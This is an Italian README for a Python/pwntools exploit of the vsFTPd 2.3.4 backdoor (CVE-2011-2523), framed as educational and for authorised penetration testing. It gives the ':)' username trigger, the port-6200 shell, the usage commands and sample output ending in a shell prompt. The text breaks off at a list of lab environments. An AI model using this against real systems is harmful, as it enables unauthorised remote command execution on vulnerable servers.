
Exploit in Python per il backdoor di vsFTPd 2.3.4 (CVE-2011-2523) che attiva una shell nascosta sulla porta 6200 tramite un nome utente appositamente modificato, consentendo l'esecuzione remota di comandi per test di penetrazione autorizzati.
Questo progetto dimostra lo sfruttamento della vulnerabilità backdoor vsFTPd 2.3.4 (CVE-2011-2523) usando Python e pwntools.
Disclaimer: Questo progetto è solo a scopo educativo e per test di penetrazione autorizzati. NON usarlo contro sistemi senza permesso.
👉 La versione vulnerabile di vsFTPd contiene una backdoor maliziosa che viene attivata quando viene usato un nome utente contenente :) durante l'accesso.
vsFTPd 2.3.4USER hello:))pwntoolsInstalla le dipendenze:
pip install pwntools
python3 exploit.py <TARGET_IP>
python3 exploit.py <TARGET_IP> <PORT>
python3 exploit.py 192.168.190.140
[+] Checking FTP Version...
[+] Triggering backdoor...
[+] Connecting to backdoor....
[+] Got Shell
$
Il target deve eseguire vsFTPd 2.3.4 (versione vulnerabile)
La porta 6200 deve essere raggiungibile
Funziona meglio in ambienti di laboratorio come: